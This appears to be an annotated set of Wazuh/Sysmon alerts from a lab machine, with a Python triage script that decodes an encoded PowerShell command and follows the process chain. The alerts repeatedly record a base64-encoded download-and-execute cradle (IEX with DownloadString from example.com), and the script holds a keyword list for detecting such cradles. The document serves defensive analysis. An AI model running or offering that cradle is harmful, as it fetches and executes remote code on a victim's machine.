data.win.eventdata.processGuid: {94294ddc-bd07-680a-160b-000000000e00} Sysmon's process GUID. Unlike the PID it is not reused after the process exits, so it is the key for joining this EID 1 to the EID 11 and other events from the same process.
data.win.eventdata.processId: 5848 PID of the new process. PIDs are reused, so correlate on processGuid instead.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that started.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the image's PE version resource.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Original file name from the PE version resource. It survives renaming the binary on disk, so a mismatch with image is a red flag.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. The -EncodedCommand argument is base64 of a UTF-16LE string; it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), the same download cradle as in the previous EID 1 alert.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (DOMAIN\user).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} GUID of the logon session the process belongs to; unchanged from the earlier alert, so this is the same logon.
data.win.eventdata.logonId: 0x26584 Logon session ID. Pivot to the Security log 4624 event with the same Logon ID to see how this session was created.
data.win.eventdata.terminalSessionId: 1 Windows session number. 1 is an interactive desktop session; 0 is where services run.
data.win.eventdata.integrityLevel: Medium Token integrity level. Medium is a standard, non-elevated user; High would mean an elevated (admin) token.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image file. This is the hash of powershell.exe itself, so it confirms the binary is genuine; it says nothing about the payload.
data.win.eventdata.parentProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} Sysmon GUID of the parent. It equals the processGuid of the earlier EID 1 alert for PID 13712, which links the two alerts into one chain.
data.win.eventdata.parentProcessId: 13712 PID of the parent.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Path of the parent executable.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's full command line. Identical to commandLine again: the chain is now 10808 -> 13712 -> 5848, each generation carrying the same payload.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child; a change here would mean a token or privilege boundary was crossed.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline, then check it against the evidence: as in the earlier EID 11 alert, the file is a __PSScriptPolicyTest_*.ps1 start-up probe that PowerShell writes to %TEMP% to test AppLocker/WDAC script enforcement, not a dropped tool. It matters only because the creating process (PID 5848) is the next link in the encoded-command PowerShell chain.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 46 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1294509 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID must be read against Sysmon's numbering, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; this is Sysmon's fixed provider GUID.
data.win.system.eventID: 11 Sysmon event ID, not a Security log ID. 11 = FileCreate.
data.win.system.version: 2 Schema version of this event type; Sysmon bumps it when it adds fields.
data.win.system.level: 4 ETW level. 4 = Informational, matching severityValue below.
data.win.system.task: 11 For Sysmon events this mirrors the event ID (11 = FileCreate). The Security-log task categories (Logon, Policy Change) do not apply here.
data.win.system.opcode: 0 ETW opcode; 0 = Info. Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:57.8932258Z When the record was written to the event log (UTC). The file creation itself is stamped in data.win.eventdata.utcTime.
data.win.system.eventRecordID: 283301 Incremental log record number – handy for timeline order. This is the record right after the EID 1 for PID 5848 (283300).
data.win.system.processID: 3712 PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported on (that is data.win.eventdata.processId).
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; this is the Sysmon log.
data.win.system.computer: Attacker Host that generated the event. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:57.856
ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00}
ProcessId: 5848
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1
CreationUtcTime: 2025-04-24 22:36:57.856
User: Attacker\Attcker1" Sysmon's rendered message text. Every field in it is also parsed into data.win.eventdata below, so search and match on those fields rather than on this string.
data.win.eventdata.utcTime: 2025-04-24 22:36:57.856 Sysmon's timestamp for the file creation (UTC).
data.win.eventdata.processGuid: {94294ddc-bd07-680a-160b-000000000e00} Sysmon GUID of the creating process. It is the same GUID as the EID 1 alert for PID 5848 above, which ties this file to the encoded-command PowerShell chain.
data.win.eventdata.processId: 5848 PID of the creating process. PIDs are reused; correlate on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Process that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1 Path of the created file. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell on every start-up to probe AppLocker/WDAC script enforcement; the random suffix changes per launch, which is why the name differs from the earlier alert.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:57.856 File creation timestamp. Equal to utcTime here, as expected for a brand-new file; an earlier value would mean an existing file was re-created or its timestamp reset.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. The -EncodedCommand is unchanged from the previous two EID 1 alerts: base64 of UTF-16LE for IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). This is the third generation of the same self-re-launching chain (10808 -> 13712 -> 5848 -> 11360), roughly three seconds apart each time, which is why rule.firedtimes keeps incrementing.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 43 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1297274 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID must be read against Sysmon's numbering, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; this is Sysmon's fixed provider GUID.
data.win.system.eventID: 1 Sysmon event ID, not a Security log ID. 1 = ProcessCreate.
data.win.system.version: 5 Schema version of this event type; Sysmon bumps it when it adds fields.
data.win.system.level: 4 ETW level. 4 = Informational, matching severityValue below.
data.win.system.task: 1 For Sysmon events this mirrors the event ID (1 = ProcessCreate). The Security-log task categories (Logon, Policy Change) do not apply here.
data.win.system.opcode: 0 ETW opcode; 0 = Info. Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:00.1422661Z When the record was written to the event log (UTC). The process start itself is stamped in data.win.eventdata.utcTime, which is earlier.
data.win.system.eventRecordID: 283325 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported on (that is data.win.eventdata.processId).
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; this is the Sysmon log.
data.win.system.computer: Attacker Host that generated the event. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:58.891
ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00}
ProcessId: 11360
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd07-680a-160b-000000000e00}
ParentProcessId: 5848
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Sysmon's rendered message text. Every field in it is also parsed into data.win.eventdata below, so search and match on those fields rather than on this string.
data.win.eventdata.utcTime: 2025-04-24 22:36:58.891 Sysmon's own timestamp for when it saw the process start (UTC). Compare with data.win.system.systemTime, which is when the record was written to the log.
data.win.eventdata.processGuid: {94294ddc-bd0a-680a-190b-000000000e00} Sysmon's process GUID. Unlike the PID it is not reused after the process exits, so it is the key for joining this EID 1 to later events from the same process.
data.win.eventdata.processId: 11360 PID of the new process. PIDs are reused, so correlate on processGuid instead.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that started.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the image's PE version resource.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Original file name from the PE version resource. It survives renaming the binary on disk, so a mismatch with image is a red flag.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. The -EncodedCommand argument is base64 of a UTF-16LE string; it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), the same download cradle as in the two previous EID 1 alerts.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (DOMAIN\user).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} GUID of the logon session the process belongs to; unchanged across the chain, so this is all one logon.
data.win.eventdata.logonId: 0x26584 Logon session ID. Pivot to the Security log 4624 event with the same Logon ID to see how this session was created.
data.win.eventdata.terminalSessionId: 1 Windows session number. 1 is an interactive desktop session; 0 is where services run.
data.win.eventdata.integrityLevel: Medium Token integrity level. Medium is a standard, non-elevated user; High would mean an elevated (admin) token.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image file. This is the hash of powershell.exe itself, so it confirms the binary is genuine; it says nothing about the payload.
data.win.eventdata.parentProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} Sysmon GUID of the parent. It equals the processGuid of the EID 1 alert for PID 5848, which links this alert into the same chain.
data.win.eventdata.parentProcessId: 5848 PID of the parent.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Path of the parent executable.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's full command line. Identical to commandLine for the third time: the chain is now 10808 -> 13712 -> 5848 -> 11360, each generation carrying the same payload.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child; a change here would mean a token or privilege boundary was crossed.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
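The alerts above are easier to triage as one chain than as six separate hits: decode the -EncodedCommand once, follow ParentProcessGuid back to the root, and separate PowerShell's own __PSScriptPolicyTest_*.ps1 start-up probes from real file drops. The script below is an added example of that triage logic and is not part of the page or of Wazuh; the event list is constructed here from the PIDs, ProcessGuids, paths and encoded payload shown in the alerts, with the Sysmon fields reduced to the ones the logic needs. The regex for the -EncodedCommand switch accepts the abbreviations powershell.exe itself accepts (-e, -ec, -enc, ...), and the cradle keyword list is a triage heuristic, not a Wazuh rule.

```python
import base64
import binascii
import re

# Constructed sample: the EID 1 / EID 11 fields from the alerts above.
ENCODED = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
PS = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
CMDLINE = f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENCODED}'

EVENTS = [
    {"eventID": 1, "utcTime": "2025-04-24 22:36:52.626",
     "processGuid": "{94294ddc-bd04-680a-0f0b-000000000e00}", "processId": 13712,
     "parentProcessGuid": "{94294ddc-bd02-680a-0b0b-000000000e00}", "parentProcessId": 10808,
     "commandLine": CMDLINE, "parentCommandLine": CMDLINE},
    {"eventID": 11, "utcTime": "2025-04-24 22:36:54.027",
     "processGuid": "{94294ddc-bd04-680a-0f0b-000000000e00}", "processId": 13712,
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tav0px12.umw.ps1"},
    {"eventID": 1, "utcTime": "2025-04-24 22:36:55.050",
     "processGuid": "{94294ddc-bd07-680a-160b-000000000e00}", "processId": 5848,
     "parentProcessGuid": "{94294ddc-bd04-680a-0f0b-000000000e00}", "parentProcessId": 13712,
     "commandLine": CMDLINE, "parentCommandLine": CMDLINE},
    {"eventID": 11, "utcTime": "2025-04-24 22:36:57.856",
     "processGuid": "{94294ddc-bd07-680a-160b-000000000e00}", "processId": 5848,
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1"},
    {"eventID": 1, "utcTime": "2025-04-24 22:36:58.891",
     "processGuid": "{94294ddc-bd0a-680a-190b-000000000e00}", "processId": 11360,
     "parentProcessGuid": "{94294ddc-bd07-680a-160b-000000000e00}", "parentProcessId": 5848,
     "commandLine": CMDLINE, "parentCommandLine": CMDLINE},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# PowerShell writes this probe file to %TEMP% on every start-up to test AppLocker/WDAC.
POLICY_PROBE_RE = re.compile(r"\\Temp\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.IGNORECASE)
# Triage heuristic (assumption, not a Wazuh rule): tokens typical of download cradles.
CRADLE_TOKENS = ("downloadstring", "downloadfile", "iex", "invoke-expression", "invoke-webrequest")


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or None if absent or malformed.
    The argument is base64 of the script encoded as UTF-16LE, not UTF-8."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le").rstrip("\x00")
    except (binascii.Error, UnicodeDecodeError):
        return None


def looks_like_download_cradle(script):
    s = script.lower()
    return any(tok in s for tok in CRADLE_TOKENS)


def is_policy_probe(path):
    return POLICY_PROBE_RE.search(path) is not None


def process_chain(events):
    """Follow ParentProcessGuid from the newest EID 1 back to the root.
    Returns PIDs root-first; the root has no EID 1 of its own in the sample,
    so it is known only through its child's parentProcessId."""
    creates = [e for e in events if e["eventID"] == 1]
    by_guid = {e["processGuid"]: e for e in creates}
    parents = {e["parentProcessGuid"] for e in creates}
    leaves = [e for e in creates if e["processGuid"] not in parents]
    if not leaves:
        return []
    cur = max(leaves, key=lambda e: e["utcTime"])
    pids, seen = [cur["processId"]], {cur["processGuid"]}
    while cur["parentProcessGuid"] in by_guid and cur["parentProcessGuid"] not in seen:
        cur = by_guid[cur["parentProcessGuid"]]
        seen.add(cur["processGuid"])
        pids.append(cur["processId"])
    pids.append(cur["parentProcessId"])
    return pids[::-1]


def self_respawn_links(events):
    """Process starts whose command line is byte-identical to the parent's."""
    return sum(1 for e in events
               if e["eventID"] == 1 and e["commandLine"] == e["parentCommandLine"])


def triage(events):
    """Reduce the alert stream to payload, process chain, and which file drops are noise."""
    creates = [e for e in events if e["eventID"] == 1]
    chain_guids = {e["processGuid"] for e in creates}
    decoded = next((d for d in (decode_encoded_command(e["commandLine"]) for e in creates) if d), None)
    file_creates = [
        {"pid": e["processId"], "path": e["targetFilename"],
         "by_chain_process": e["processGuid"] in chain_guids,
         "startup_probe": is_policy_probe(e["targetFilename"])}
        for e in events if e["eventID"] == 11
    ]
    return {
        "decoded_command": decoded,
        "download_cradle": bool(decoded) and looks_like_download_cradle(decoded),
        "chain_pids": process_chain(events),
        "self_respawn_links": self_respawn_links(events),
        "file_creates": file_creates,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(EVENTS), indent=2))
```

Running it on the sample prints the decoded cradle, the chain 10808 -> 13712 -> 5848 -> 11360, three parent-identical re-launches, and both EID 11 hits flagged as start-up probes created by chain processes. The two flags together are the point: a policy-probe file alone is noise and a candidate for a Sysmon exclusion, but a policy-probe file created by a process in a suspicious chain is evidence that PowerShell really started, so keep it attached to the EID 1 case instead of closing it as a false positive.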
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline, then verify it: the two previous EID 11 alerts in this chain were __PSScriptPolicyTest_*.ps1 start-up probes that PowerShell writes to %TEMP% on launch, so check data.win.eventdata.targetFilename before treating this one as a real drop, and keep it linked to the EID 1 chain either way.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 47 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534230.1305341 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:00.3905368Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283335 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:00.377
ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00}
ProcessId: 11360
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gypnpqaz.wjv.ps1
CreationUtcTime: 2025-04-24 22:37:00.377
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:00.377 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd0a-680a-190b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11360 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gypnpqaz.wjv.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:00.377 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 44 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534230.1308110 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
